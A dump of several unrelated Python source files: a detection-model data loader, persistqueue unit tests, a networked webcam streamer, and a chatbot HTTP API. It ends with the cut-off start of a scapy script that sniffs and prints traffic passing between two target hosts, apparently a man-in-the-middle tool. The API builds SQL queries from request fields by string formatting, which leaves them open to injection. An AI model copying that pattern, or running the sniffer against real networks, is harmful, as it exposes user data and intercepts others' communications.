img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
with open(bb_path) as f:
lines = f.read().splitlines()
boxes = []
for line in lines:
ix, xmin, ymin, xmax, ymax = line.split('\t')
onehot_label = np.eye(self.num_classes)[int(ix)]
box = [float(xmin), float(ymin), float(xmax), float(ymax)] + onehot_label.tolist()
boxes.append(box)
img, boxes = augment(img, boxes, self.input_size)
if len(boxes) == 0:
continue
boxes = np.array(boxes)
assignment = assign_boxes(boxes, self.priors, self.num_classes, self.assignment_threshold)
q.put([img, assignment])
def get(self, batch_size):
x_batch = []
t_batch = []
for _ in range(batch_size):
while True:
if self.q.qsize() == 0:
time.sleep(1)
continue
img, assignment = self.q.get()
x_batch.append(img)
t_batch.append(assignment)
break
return np.asarray(x_batch), np.asarray(t_batch)
|
test_queue.py
|
# coding=utf-8
import os
import pickle
import random
import shutil
import sys
import tempfile
import unittest
from collections import namedtuple
from nose2.tools import params
from threading import Thread
import persistqueue.serializers.json
import persistqueue.serializers.msgpack
import persistqueue.serializers.pickle
from persistqueue import Queue, Empty, Full
# map keys as params for readable errors from nose
serializer_params = {
"serializer=default": {},
"serializer=json": {"serializer": persistqueue.serializers.json},
"serializer=msgpack": {"serializer": persistqueue.serializers.msgpack},
"serializer=pickle": {"serializer": persistqueue.serializers.pickle},
}
class PersistTest(unittest.TestCase):
def setUp(self):
self.path = tempfile.mkdtemp(suffix='queue')
def tearDown(self):
shutil.rmtree(self.path, ignore_errors=True)
@params(*serializer_params)
def test_open_close_single(self, serializer):
"""Write 1 item, close, reopen checking if same item is there"""
q = Queue(self.path, **serializer_params[serializer])
q.put('var1')
del q
q = Queue(self.path, **serializer_params[serializer])
self.assertEqual(1, q.qsize())
self.assertEqual('var1', q.get())
q.task_done()
@params(*serializer_params)
def test_open_close_1000(self, serializer):
"""Write 1000 items, close, reopen checking if all items are there"""
q = Queue(self.path, **serializer_params[serializer])
for i in range(1000):
q.put('var%d' % i)
self.assertEqual(1000, q.qsize())
del q
q = Queue(self.path, **serializer_params[serializer])
self.assertEqual(1000, q.qsize())
for i in range(1000):
data = q.get()
self.assertEqual('var%d' % i, data)
q.task_done()
with self.assertRaises(Empty):
q.get_nowait()
# assert adding another one still works
q.put('foobar')
data = q.get()
@params(*serializer_params)
def test_partial_write(self, serializer):
"""Test recovery from previous crash w/ partial write"""
q = Queue(self.path, **serializer_params[serializer])
for i in range(100):
q.put('var%d' % i)
del q
with open(os.path.join(self.path, 'q00000'), 'ab') as f:
pickle.dump('文字化け', f)
q = Queue(self.path, **serializer_params[serializer])
self.assertEqual(100, q.qsize())
for i in range(100):
self.assertEqual('var%d' % i, q.get())
q.task_done()
with self.assertRaises(Empty):
q.get_nowait()
@params(*serializer_params)
def test_random_read_write(self, serializer):
"""Test random read/write"""
q = Queue(self.path, **serializer_params[serializer])
n = 0
for i in range(1000):
if random.random() < 0.5:
if n > 0:
q.get_nowait()
q.task_done()
n -= 1
else:
with self.assertRaises(Empty):
q.get_nowait()
else:
q.put('var%d' % random.getrandbits(16))
n += 1
@params(*serializer_params)
def test_multi_threaded(self, serializer):
"""Create consumer and producer threads, check parallelism"""
q = Queue(self.path, **serializer_params[serializer])
def producer():
for i in range(1000):
q.put('var%d' % i)
def consumer():
for i in range(1000):
q.get()
q.task_done()
c = Thread(target=consumer)
c.start()
p = Thread(target=producer)
p.start()
c.join()
p.join()
q.join()
with self.assertRaises(Empty):
q.get_nowait()
@params(*serializer_params)
def test_garbage_on_head(self, serializer):
"""Adds garbage to the queue head and let the internal integrity
checks fix it"""
q = Queue(self.path, **serializer_params[serializer])
q.put('var1')
del q
with open(os.path.join(self.path, 'q00000'), 'ab') as f:
f.write(b'garbage')
q = Queue(self.path, **serializer_params[serializer])
q.put('var2')
self.assertEqual(2, q.qsize())
self.assertEqual('var1', q.get())
q.task_done()
@params(*serializer_params)
def test_task_done_too_many_times(self, serializer):
"""Test too many task_done called."""
q = Queue(self.path, **serializer_params[serializer])
q.put('var1')
q.get()
q.task_done()
with self.assertRaises(ValueError):
q.task_done()
@params(*serializer_params)
def test_get_timeout_negative(self, serializer):
q = Queue(self.path, **serializer_params[serializer])
q.put('var1')
with self.assertRaises(ValueError):
q.get(timeout=-1)
@params(*serializer_params)
def test_get_timeout(self, serializer):
"""Test when get failed within timeout."""
q = Queue(self.path, **serializer_params[serializer])
q.put('var1')
q.get()
with self.assertRaises(Empty):
q.get(timeout=1)
@params(*serializer_params)
def test_put_nowait(self, serializer):
"""Tests the put_nowait interface."""
q = Queue(self.path, **serializer_params[serializer])
q.put_nowait('var1')
self.assertEqual('var1', q.get())
q.task_done()
@params(*serializer_params)
def test_put_maxsize_reached(self, serializer):
"""Test that maxsize reached."""
q = Queue(self.path, maxsize=10, **serializer_params[serializer])
for x in range(10):
q.put(x)
with self.assertRaises(Full):
q.put('full_now', block=False)
@params(*serializer_params)
def test_put_timeout_reached(self, serializer):
"""Test put with block and timeout."""
q = Queue(self.path, maxsize=2, **serializer_params[serializer])
for x in range(2):
q.put(x)
with self.assertRaises(Full):
q.put('full_and_timeout', block=True, timeout=1)
@params(*serializer_params)
def test_put_timeout_negative(self, serializer):
"""Test and put with timeout < 0"""
q = Queue(self.path, maxsize=1, **serializer_params[serializer])
with self.assertRaises(ValueError):
q.put('var1', timeout=-1)
@params(*serializer_params)
def test_put_block_and_wait(self, serializer):
"""Test block until queue is not full."""
q = Queue(self.path, maxsize=10, **serializer_params[serializer])
def consumer():
for i in range(5):
q.get()
q.task_done()
def producer():
for j in range(16):
q.put('var%d' % j)
p = Thread(target=producer)
p.start()
c = Thread(target=consumer)
c.start()
c.join()
val = q.get_nowait()
p.join()
self.assertEqual('var5', val)
@params(*serializer_params)
def test_clear_tail_file(self, serializer):
"""Test that only remove tail file when calling task_done."""
q = Queue(self.path, chunksize=10, **serializer_params[serializer])
for i in range(35):
q.put('var%d' % i)
for _ in range(15):
q.get()
q = Queue(self.path, chunksize=10, **serializer_params[serializer])
self.assertEqual(q.qsize(), 35)
for _ in range(15):
q.get()
# the first tail file gets removed after task_done
q.task_done()
for _ in range(16):
q.get()
# the second and third files get removed after task_done
q.task_done()
self.assertEqual(q.qsize(), 4)
def test_protocol(self):
# test that protocol is set properly
expect_protocol = 2 if sys.version_info[0] == 2 else 4
self.assertEqual(
persistqueue.serializers.pickle.protocol,
expect_protocol,
)
# test that protocol is used properly
serializer = namedtuple("Serializer", ["dump", "load"])(
persistqueue.serializers.pickle.dump, lambda fp: fp.read())
q = Queue(path=self.path, serializer=serializer)
q.put(b'a')
self.assertEqual(q.get(), pickle.dumps(b'a', protocol=expect_protocol))
|
NetCam.py
|
################################################################################
## Classe NetCam
## Gere un flux camera caméra à travers un réseau
## Author : J. Coupez
## Date : 10/10/2020
## Version : 0.1
################################################################################
import time
from threading import Thread
import zmq
import cv2
import base64
import numpy as np
import socket
# import pyguetzli
class NetCam:
DEFAULT_CLIENT_PORT = '5556'
DEFAULT_WINDOW_NAME = 'Stream'
WINDOW_COUNTER = 0
DEFAULT_RES = 'HD'
MAX_FPS = 60
NBR_BUFFER = 5
TEXT_COLOR = (0, 0, 255)
TEXT_POSITION = (0, 0)
def __init__(self,
capture='VGA',
display=None,
isStereoCam=False,
source='0',
ip=None,
port=None,
consolelog=True):
self.consoleLog = consolelog
self.captureResolution = capture
self.displayResolution = display
self.isStereoCam = isStereoCam
self.source = source
self.imgWidth, self.imgHeight = resolutionFinder(self.captureResolution, self.isStereoCam)
self.displayWidth, self.displayHeight = resolutionFinder(self.displayResolution)
self.fps = NetCam.MAX_FPS
self.imgBuffer = [None] * NetCam.NBR_BUFFER
self.imgBufferReady = 0
self.imgBufferWriting = 0
self.flipVertical = False
self.isCaptureRunning = False
self.isDisplayRunning = False
self.isNetworkRunning = False
self.fullScreen = False
self.videoStream = None
## Debug informations
self.displayDebug = False
self.showStereo = False
self.displayFps = FpsCatcher()
self.captureFps = FpsCatcher()
self.networkFps = FpsCatcher()
# Network information
self.hostname = socket.gethostname()
self.ip_address = ip
self.ip_port = port or NetCam.DEFAULT_CLIENT_PORT
self.windowName = ip or self.hostname or NetCam.DEFAULT_WINDOW_NAME
NetCam.WINDOW_COUNTER += 1
if NetCam.WINDOW_COUNTER > 1:
self.windowName += f' ({NetCam.WINDOW_COUNTER})'
self.threadList = []
self.console('Starting NetCam...')
if self.ip_address is None:
# Start the capture
self.startCapture()
else:
# Start to receive the stream
self.startReceive()
time.sleep(0.1)
## Init the display when requested (on main thread)
if self.displayResolution:
self.initDisplay()
time.sleep(0.1)
def startCapture(self):
"""
Start capturing video frame and put them in the imgBuffer
"""
## Close any previously opened stream
if self.isCaptureRunning and self.videoStream:
self.videoStream.release()
self.isCaptureRunning = False
## Launch the camera capture thread
self.console('Init camera capture...', 1)
## prepare the triple buffering
self.videoStream = self.initVideoStream(self.source)
## Get the real width, height and fps supported by the camera
self.imgWidth = int(self.videoStream.get(cv2.CAP_PROP_FRAME_WIDTH))
self.imgHeight = int(self.videoStream.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.fps = self.videoStream.get(cv2.CAP_PROP_FPS)
self.computeDisplayHeight()
self.console(f'Capture resolution : {self.imgWidth} x {self.imgHeight} @ {self.fps}', 1)
# Initialise each buffer
for i in range(NetCam.NBR_BUFFER):
self.imgBuffer[i] = np.empty(shape=(self.imgHeight, self.imgWidth, 3), dtype=np.uint8)
## Guarantee the first frame
self.videoStream.read(self.imgBuffer[self.imgBufferWriting])
self.imgBufferWriting += 1
## Launch the capture thread
videoThread = Thread(target=self.captureThreadRunner, args=([self.videoStream]), daemon=True)
videoThread.start()
def startBroadcast(self):
"""
Launch the network client ( broadcast the camera signal)
"""
## Launch the networdThread
self.ip_address = get_ip()
self.console(f'Launch broadcast...')
zmqContext = zmq.Context()
# zmqContext = SerializingContext()
socket = zmqContext.socket(zmq.PUB)
workerThread = Thread(target=self.clientThreadRunner, args=([socket]))
self.threadList.append(workerThread)
workerThread.start()
time.sleep(0.1)
self.console(f'Now broadcasting. URI of Camera : {self.ip_address}:{self.ip_port} !')
def startReceive(self):
"""
Launch the network client ( broadcast the camera signal)
"""
## Launch the networdThread
self.console(f'Connecting to camera on {self.ip_address}:{self.ip_port}...', 1)
zmqContext = zmq.Context()
# zmqContext = SerializingContext()
socket = zmqContext.socket(zmq.SUB)
workerThread = Thread(target=self.serverThreadRunner, args=([socket]))
self.threadList.append(workerThread)
workerThread.start()
time.sleep(0.1)
def initVideoStream(self, source):
"""
Initialize the video stream with the right resolution and settings
:param source: the name of the camera device to use for capture. use video0 if not provided
"""
videoStream = cv2.VideoCapture(0 if source == '0' else source, cv2.CAP_V4L2)
isOpened = videoStream.isOpened()
if not isOpened:
# Try to open the camera without the Video for linux driver
videoStream = cv2.VideoCapture(0 if source == '0' else source)
isOpened = videoStream.isOpened()
assert isOpened, 'Unable to open camera %s . Is your camera connected (look for videoX in /dev/ ? ' % source
## Get the requested resolution
width, height = resolutionFinder(self.captureResolution, self.isStereoCam)
## Define all video settings
videoStream.set(cv2.CAP_PROP_BUFFERSIZE,
NetCam.NBR_BUFFER) # increase camera buffering to 3 for triple buffering
videoStream.set(cv2.CAP_PROP_FPS, NetCam.MAX_FPS) # try to put the fps to MAX_FPS
videoStream.set(cv2.CAP_PROP_FOURCC,
cv2.VideoWriter_fourcc('M', 'J', 'P', 'G')) # define the compression to mjpg
videoStream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
videoStream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
return videoStream
def captureThreadRunner(self, stream):
"""
Read next stream frame in a daemon thread
:param stream: videoStream to read from
"""
self.isCaptureRunning = True
self.console('Capture thread is now running.', 1)
while self.isCaptureRunning:
# For buffering : Never read where we write
self.imgBufferReady = self.imgBufferWriting
self.imgBufferWriting = 0 if self.imgBufferWriting == NetCam.NBR_BUFFER - 1 else self.imgBufferWriting + 1
stream.read(self.imgBuffer[self.imgBufferWriting])
if self.displayDebug:
self.captureFps.compute()
time.sleep(0.001)
if self.videoStream and self.videoStream.isOpened():
self.videoStream.release()
self.console('Released camera.', 1)
self.videoStream = None
self.console('Capture thread stopped.', 1)
def clientThreadRunner(self, socket):
"""
Publish Data to any connected Server
:param socket:
"""
url_publish = "tcp://*:%s" % self.ip_port
socket.setsockopt(zmq.CONFLATE, 1)
socket.set_hwm(2)
socket.bind(url_publish)
self.isNetworkRunning = True
self.console(f'Network thread is now running ( {url_publish} )...', 1)
# i = 0
# topic = 1234
initTime = FpsCatcher.currentMilliTime()
bufferSize = 0
bufferSizeSec = 0
frameCount = 0
while self.isNetworkRunning:
if self.displayDebug:
self.networkFps.compute()
currentTime = FpsCatcher.currentMilliTime()
# encoded, buffer = cv2.imencode('.jpg', np.empty(shape=(5, 5, 3), dtype=np.uint8))
encoded, buffer = cv2.imencode('.jpg', self.imgBuffer[self.imgBufferReady])
# result = cv2.imwrite("test.jpg",self.imgBuffer[self.imgBufferReady])
# self.console(result)
# input_jpeg_bytes = open("test.jpg", "rb").read()
# imgBuffer = self.imgBuffer[self.imgBufferReady]
# imgBuffer = imgBuffer.ravel()
# optiTime = FpsCatcher.currentMilliTime()
# optibuffer = pyguetzli.process_jpeg_bytes(input_jpeg_bytes)
# self.imgBuffer[self.imgBufferReady] = buffer
# self.console(f'comrpession time: {FpsCatcher.currentMilliTime() - optiTime} milli')
bufferSize = int(len(buffer)/1024)
bufferSizeSec += bufferSize
frameCount += 1
self.console(f'buffer size : {bufferSize*8} kb ({bufferSize}ko)')
if currentTime - initTime > 1000:
self.console(f'frame send per sec: {frameCount}',1)
self.console(f'buffer size per sec : {bufferSizeSec*8} kb ({bufferSizeSec}ko)',1)
bufferSizeSec = 0
frameCount = 0
initTime = currentTime
socket.send(buffer, copy=False)
processTime = FpsCatcher.currentMilliTime() - currentTime
waitTime = 1
if processTime > 0 and processTime < 33:
waitTime = 33 - processTime
# self.console(f'processTime : {processTime} milli - waitTime: {waitTime} milli')
waitTime = waitTime / 1000.0
time.sleep(waitTime)
self.console('Network thread stopped.')
def serverThreadRunner(self, socket):
url_publisher = f"tcp://{self.ip_address}:{self.ip_port}"
# topicfilter = "1234"
socket.setsockopt_string(zmq.SUBSCRIBE, np.unicode(''))
socket.set_hwm(2)
socket.setsockopt(zmq.CONFLATE, 1)
socket.connect(url_publisher)
self.isNetworkRunning = True
# socket.setsockopt(zmq.SUBSCRIBE, topicfilter)
self.console(f'Connected To {url_publisher}')
timeoutMsg = 0
initTime = FpsCatcher.currentMilliTime()
bufferSize = 0
frameCount = 0
while self.isNetworkRunning:
try:
currentTime = FpsCatcher.currentMilliTime()
buffer = socket.recv(flags=zmq.NOBLOCK, copy=False)
bufferSize += len(buffer) / 1024
frameCount += 1
if currentTime - initTime > 1000:
self.console(f'frame send per sec: {frameCount}')
self.console(f'buffer size per sec : {bufferSize} ko')
bufferSize = 0
frameCount = 0
initTime = currentTime
shape = [len(buffer.bytes), 1]
buffer = np.frombuffer(buffer, dtype='uint8')
buffer = buffer.reshape(shape)
# For buffering : Never read where we write
self.imgBufferReady = self.imgBufferWriting
self.imgBufferWriting = 0 if self.imgBufferWriting == NetCam.NBR_BUFFER - 1 else self.imgBufferWriting + 1
self.imgBuffer[self.imgBufferWriting] = cv2.imdecode(buffer, 1)
if self.displayDebug:
self.networkFps.compute()
if timeoutMsg >= 1000: # 1 sec elapsed
self.console(f'Re-Connected To {url_publisher}')
timeoutMsg = 0
except Exception as err:
timeoutMsg += 1
if timeoutMsg >= 3000: # 3 sec before writing timeout message
self.console(f'Waiting image from {url_publisher} ...')
timeoutMsg = 0
time.sleep(0.001)
self.isNetworkRunning = False
self.console('Network thread stopped.')
def getDetail(self):
return ({
'captureResolution': self.captureResolution,
'displayResolution': self.displayResolution,
'isStereo': self.isStereoCam,
'width': self.imgWidth,
'height': self.imgHeight,
'maxFps': self.fps,
'isCaptureRunning': self.isCaptureRunning,
})
def initDisplay(self):
self.console('Init display...', 1)
self.console(f'Display resolution : {self.displayResolution} ({self.displayWidth} x {self.displayHeight})', 2)
cv2.namedWindow(self.windowName, cv2.WINDOW_GUI_NORMAL)
self.toggleFullScreen(self.fullScreen)
self.isDisplayRunning = True
time.sleep(0.1)
self.console('Display is now ready.', 2)
def display(self):
if not self.displayResolution:
# No Display was setup
# self.console('You need to setup the display Resolution in NetCam constructor. ex : NetCam(display=\'VGA\'')
# time(1)
return
if not self.isDisplayRunning:
cv2.destroyAllWindows()
return
# Try to see if the window has been closed by clicking on the right upper cross
try:
isWindowClosed = cv2.getWindowProperty(self.windowName, 0)
if isWindowClosed == -1:
# the window has been closed
self.console("Window was closed.")
self.clearAll()
except:
self.console("Window was closed.")
self.clearAll()
return
frame = self.imgBuffer[self.imgBufferReady]
if frame is None:
return # Nothing to display
if self.isStereoCam and not self.showStereo:
# the Display is not in stereo, so remove the half of the picture
height, width, _ = frame.shape
frame = frame[0:height, 0:width // 2]
if self.displayHeight != self.imgHeight:
# Resize the picture for display purpose
width = self.displayWidth if not self.showStereo else self.displayWidth * 2
frame = cv2.resize(frame, (width, self.displayHeight))
else:
frame = np.copy(frame)
if self.flipVertical:
frame = cv2.flip(frame, 0)
if self.displayDebug:
self.displayFps.compute()
debugTextSize = self.displayWidth / 1280
thickness = 1 if self.displayWidth < 1280 else 2
textPosX, textPosY = NetCam.TEXT_POSITION
textPosX += int(40 * debugTextSize)
textPosY += int(40 * debugTextSize)
frame = cv2.putText(frame, f'Capture : {self.captureFps.fps} fps ({self.captureResolution}) | '
f'Display : {self.displayFps.fps} fps ({self.displayResolution}) | '
f'Network : {self.networkFps.fps} fps',
(textPosX, textPosY),
cv2.FONT_HERSHEY_SIMPLEX, debugTextSize, NetCam.TEXT_COLOR, thickness,
cv2.LINE_AA)
textPosY += int(40 * debugTextSize)
frame = cv2.putText(frame, f'f : fullscreen | s : see stereo | F1 to F5 : change display',
(textPosX, textPosY), cv2.FONT_HERSHEY_SIMPLEX, debugTextSize, NetCam.TEXT_COLOR,
thickness,
cv2.LINE_AA)
cv2.imshow(self.windowName, frame)
self.listenKeyboard()
def setDisplayResolution(self, resolution):
if (resolution != None):
self.displayResolution = resolution
self.displayWidth, self.displayHeight = resolutionFinder(resolution)
self.computeDisplayHeight()
cv2.resizeWindow(self.windowName, self.displayWidth, self.displayHeight)
self.console(f'Changed Display resolution for : {resolution} ({self.displayWidth} x {self.displayHeight})')
def toggleFullScreen(self, isFullScreen=None):
self.fullScreen = isFullScreen if isFullScreen is not None else not self.fullScreen
if self.fullScreen:
self.console(f'Toggle fullscreen')
cv2.namedWindow(self.windowName, cv2.WND_PROP_FULLSCREEN)
cv2.setWindowProperty(self.windowName, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
# cv2.setWindowProperty(self.windowName, cv2.WND_PROP_TOPMOST, 1.0)
else:
cv2.namedWindow(self.windowName, cv2.WINDOW_AUTOSIZE)
cv2.setWindowProperty(self.windowName, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_NORMAL)
cv2.resizeWindow(self.windowName, self.displayWidth, self.displayHeight)
# cv2.setWindowProperty(self.windowName, cv2.WND_PROP_TOPMOST, 0.0)
def toggleDisplayStereo(self, isShowStereo=None):
self.showStereo = isShowStereo if isShowStereo is not None else not self.showStereo
self.console(f'Show Stereo : {self.showStereo}')
def listenKeyboard(self):
key = cv2.waitKey(20)
if key != -1:
if key == ord('q'): # q to quit
self.clearAll()
elif key == 35 or key == 47: # Tilde to show debug
self.toggleDebug()
elif key == 190 or key == 122: # F1
self.setDisplayResolution('QVGA')
elif key == 191 or key == 120: # F2
self.setDisplayResolution('VGA')
elif key == 192 or key == 99: # F3
self.setDisplayResolution('HD')
elif key == 193 or key == 118: # F4
self.setDisplayResolution('FHD')
elif key == 194 or key == 96: # F5
self.setDisplayResolution('2K')
elif key == ord('f'): # F to toggle fullscreen
self.toggleFullScreen()
elif key == ord('s'): # S to toggle display stereo
self.toggleDisplayStereo()
elif key == 27: # Esc key was pressed,
self.toggleFullScreen(False)
else:
print(f'Key pressed: {key}')
def toggleDebug(self):
self.displayDebug = not self.displayDebug
self.console(f'Debugging is now {self.displayDebug}.')
self.displayFps.initTime()
self.captureFps.initTime()
self.networkFps.initTime()
def clearAll(self):
if self.isNetworkRunning:
self.console('Stopping Network...')
self.isNetworkRunning = False
time.sleep(0.1)
if self.isDisplayRunning:
self.console('Stopping Display...')
self.isDisplayRunning = False
time.sleep(0.1)
if self.isCaptureRunning:
self.console('Stopping Capture...')
self.isCaptureRunning = False
time.sleep(0.1)
self.threadList = []
zmqContext = zmq.Context.instance()
zmqContext.term()
time.sleep(0.5)
self.console('Stopping Done.')
def computeDisplayHeight(self):
widthMultiplier = 2 if self.isStereoCam else 1
if self.imgWidth and self.imgHeight and self.displayWidth:
self.displayHeight = int(self.displayWidth / (self.imgWidth // widthMultiplier) * self.imgHeight)
def invertVertical(self):
self.flipVertical = not self.flipVertical
def isRunning(self):
return self.isCaptureRunning or self.isDisplayRunning or self.isNetworkRunning
def console(self, text, indentlevel=0):
if self.consoleLog:
output = time.strftime('%b %d at %H:%M:%S') + ' : '
for count in range(0, indentlevel):
output = output + '\t'
print(f'{output}{text}')
def resolutionFinder(res, isstereocam=False):
if res == None:
return (None, None)
widthMultiplier = 2 if isstereocam else 1
# switcher = {
# 'QVGA': 320 ,
# 'VGA': 640 ,
# 'HD': 1280 ,
# 'FHD': 1920 ,
# '2K': 2048
# }
switcher = {
'QVGA': (320 * widthMultiplier, 240),
'VGA': (640 * widthMultiplier, 480),
'HD': (1280 * widthMultiplier, 720),
'FHD': (1920 * widthMultiplier, 1080),
'2K': (2048 * widthMultiplier, 1080)
}
return switcher.get(res, (640 * widthMultiplier, 480))
def get_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except Exception:
IP = '127.0.0.1'
finally:
s.close()
return IP
class FpsCatcher:
currentMilliTime = lambda: int(round(time.time() * 1000))
def __init__(self):
self.initTime()
def initTime(self):
self.currentTime = 0
self.currentFrame = 0
self.fps = 0
def compute(self):
now = FpsCatcher.currentMilliTime()
if now - self.currentTime >= 1000:
self.currentTime = now
self.fps = self.currentFrame
self.currentFrame = 0
self.currentFrame += 1
|
api.py
|
from __future__ import print_function
import hug
from hug_middleware_cors import CORSMiddleware
import waitress
from threading import Thread
import json
from dragonfire.omniscient import Engine
from dragonfire.conversational import DeepConversation
from dragonfire.learn import Learner
from dragonfire.config import Config
from dragonfire.arithmetic import arithmetic_parse
import wikipedia as wikipedia_lib
import re
import youtube_dl
import pymysql
import random
nlp = None
omniscient = None
userin = None
dc = None
learner = None
precomptoken = None
@hug.authentication.token
def token_authentication(token):
if token == precomptoken:
return True
@hug.post('/tag', requires=token_authentication)
def tagger_end(text):
return json.dumps(tagger(text), indent=4)
def tagger(text):
data = []
doc = nlp(text)
for token in doc:
parse = {
'text': token.text,
'lemma': token.lemma_,
'pos': token.pos_,
'tag': token.tag_,
'dep': token.dep_,
'shape': token.shape_,
'is_alpha': token.is_alpha,
'is_stop': token.is_stop
}
data.append(parse)
return data
@hug.post('/dep', requires=token_authentication)
def dependency_parser_end(text):
return json.dumps(dependency_parser(text), indent=4)
def dependency_parser(text):
data = []
doc = nlp(text)
for chunk in doc.noun_chunks:
parse = {
'text': chunk.text,
'root_text': chunk.root.text,
'root_dep': chunk.root.dep_,
'root_head_text': chunk.root.head.text,
}
data.append(parse)
return data
@hug.post('/ner', requires=token_authentication)
def entity_recognizer_end(text):
return json.dumps(entity_recognizer(text), indent=4)
def entity_recognizer(text):
data = []
doc = nlp(text)
for ent in doc.ents:
parse = {
'text': ent.text,
'start_char': ent.start_char,
'end_char': ent.end_char,
'label': ent.label_,
}
data.append(parse)
return data
@hug.post('/token', requires=token_authentication)
def tokenizer_end(text):
return json.dumps(tokenizer(text), indent=4)
def tokenizer(text):
data = []
doc = nlp(text)
for token in doc:
data.append(token.text)
return data
@hug.post('/sent', requires=token_authentication)
def sentence_segmenter_end(text):
return json.dumps(sentence_segmenter(text), indent=4)
def sentence_segmenter(text):
data = []
doc = nlp(text)
for sent in doc.sents:
data.append(sent.text)
return data
@hug.post('/cmd', requires=token_authentication)
def cmd(text):
return json.dumps(all_in_one(text), indent=4)
def all_in_one(text):
data = []
sents = sentence_segmenter(text)
for sent in sents:
sent_data = {}
sent_data['tags'] = tagger(sent)
sent_data['deps'] = dependency_parser(sent)
sent_data['ners'] = entity_recognizer(sent)
data.append(sent_data)
return data
@hug.post('/omni', requires=token_authentication)
def omni(text, gender_prefix):
answer = omniscient.respond(text, userin=userin, user_prefix=gender_prefix, is_server=True)
if not answer:
answer = ""
return json.dumps(answer, indent=4)
@hug.post('/deep', requires=token_authentication)
def deep(text, gender_prefix):
answer = dc.respond(text, user_prefix=gender_prefix)
return json.dumps(answer, indent=4)
@hug.post('/wikipedia', requires=token_authentication)
def wikipedia(query, gender_prefix):
response = ""
url = ""
wikiresult = wikipedia_lib.search(query)
if len(wikiresult) == 0:
response = "Sorry, " + gender_prefix + ". But I couldn't find anything about " + query + " in Wikipedia."
else:
wikipage = wikipedia_lib.page(wikiresult[0])
wikicontent = "".join([
i if ord(i) < 128 else ' '
for i in wikipage.content
])
wikicontent = re.sub(r'\([^)]*\)', '', wikicontent)
response = " ".join(sentence_segmenter(wikicontent)[:3])
url = wikipage.url
data = {}
data['response'] = response
data['url'] = url
return json.dumps(data, indent=4)
@hug.post('/youtube', requires=token_authentication)
def youtube(query, gender_prefix):
response = ""
url = ""
info = youtube_dl.YoutubeDL({}).extract_info('ytsearch:' + query, download=False, ie_key='YoutubeSearch')
if len(info['entries']) > 0:
response = info['entries'][0]['title']
url = "https://www.youtube.com/watch?v=%s" % (info['entries'][0]['id'])
response = "".join([
i if ord(i) < 128 else ' '
for i in response
])
else:
response = "No video found, " + gender_prefix + "."
data = {}
data['response'] = response
data['url'] = url
return json.dumps(data, indent=4)
@hug.post('/learn', requires=token_authentication)
def learn(text, user_id):
response = learner.respond(text, is_server=True, user_id=user_id)
if not response:
response = ""
return json.dumps(response, indent=4)
@hug.post('/math', requires=token_authentication)
def math(text):
response = arithmetic_parse(text)
if not response:
response = ""
return json.dumps(response, indent=4)
@hug.post('/notification', requires=token_authentication)
def notification(user_id, location, gender_prefix):
url = ""
title = ""
message = ""
db = pymysql.connect(Config.MYSQL_HOST, Config.MYSQL_USER, Config.MYSQL_PASS, Config.MYSQL_DB)
cursor = db.cursor(pymysql.cursors.DictCursor)
sql1 = "SELECT * FROM users WHERE id = {}".format(user_id)
sql2 = "SELECT * FROM notifications"
try:
cursor.execute(sql1)
results = cursor.fetchall()
if results:
row = results[0]
name = row["name"]
gender = row["gender"]
birth_date = row["birth_date"]
else:
name = "Master"
gender = 1
birth_date = "1980-01-01"
cursor.execute(sql2)
results = cursor.fetchall()
row = random.choice(results)
if row["capitalize"] == 1:
gender_prefix = gender_prefix.capitalize()
url = row["url"]
title = row["title"]
message = row["message"].format(gender_prefix, name)
except pymysql.InternalError as error:
code, message = error.args
print (">>>>>>>>>>>>>", code, message)
db.close()
data = {}
data['url'] = url
data['title'] = title
data['message'] = message
return json.dumps(data, indent=4)
@hug.post('/register', requires=token_authentication)
def register(name, gender, birth_date):
id = ""
db = pymysql.connect(Config.MYSQL_HOST, Config.MYSQL_USER, Config.MYSQL_PASS, Config.MYSQL_DB)
cursor = db.cursor(pymysql.cursors.DictCursor)
sql = """
INSERT INTO users (name, gender, birth_date)
VALUES('{}', '{}', '{}')
""".format(name, gender, birth_date)
try:
cursor.execute(sql)
db.commit()
id = cursor.lastrowid
except pymysql.InternalError as error:
code, message = error.args
print (">>>>>>>>>>>>>", code, message)
db.close()
return json.dumps(id, indent=4)
class Run():
def __init__(self, nlpRef, userinRef, token):
global nlp
global omniscient
global userin
global dc
global precomptoken
global learner
nlp = nlpRef # Load en_core_web_sm, English, 50 MB, default model
omniscient = Engine(nlp)
dc = DeepConversation()
learner = Learner(nlp)
userin = userinRef
precomptoken = token
app = hug.API(__name__)
app.http.output_format = hug.output_format.text
app.http.add_middleware(CORSMiddleware(app))
t = Thread(target=waitress.serve, args=(__hug_wsgi__, ), kwargs={"port": 3301})
t.start()
t.join()
if __name__ == '__main__':
app = hug.API(__name__)
app.http.output_format = hug.output_format.text
app.http.add_middleware(CORSMiddleware(app))
waitress.serve(__hug_wsgi__, port=8000)
|
Main.py
|
__author__ = '01'
__author__ += "Binary"
__author__ += "ZeroOne"
__author__ += "Hooman"
from scapy.layers.inet import *
from scapy.all import *
import threading
import time
import sys
import os
conf.route.resync()
conf.verb = 0
def PacketAnalyze(Pck) :
if((Pck.haslayer(IP)) and ((Pck.getlayer(IP).src == Target1_IP and Pck.getlayer(IP).dst == Target2_IP) or (Pck.getlayer(IP).src == Target2_IP and Pck.getlayer(IP).dst == Target1_IP))) :
if((Pck.getlayer(IP).src == Target1_IP)) :
if(Pck.haslayer(Raw)) : print "\nTarget 1 Sent : " + str(Pck.summary()) + " ==> " + str(Pck.getlayer(Raw))
else : print "\nTarget 1 Sent : " + str(Pck.summary())
elif((Pck.getlayer(IP).src == Target2_IP)) :
if(Pck.haslayer(Raw)) : print "\nTarget 2 Sent : " + str(Pck.summary()) + " ==> " + str(Pck.getlayer(Raw))
else : print "\nTarget 2 Sent : " + str(Pck.summary())
def GetMAC(IPAddress) :
MAC = subprocess.Popen(["arp", "-n", IPAddress], stdout=subprocess.PIPE)
MAC = MAC.communicate()[0]
MAC = re.search(r"(([a-f\d]{1,2}\:){5}[a-f\d]{1,2})", MAC).groups()[0]
return MAC
def Sniff() :
print "[*] Sniffing ..."
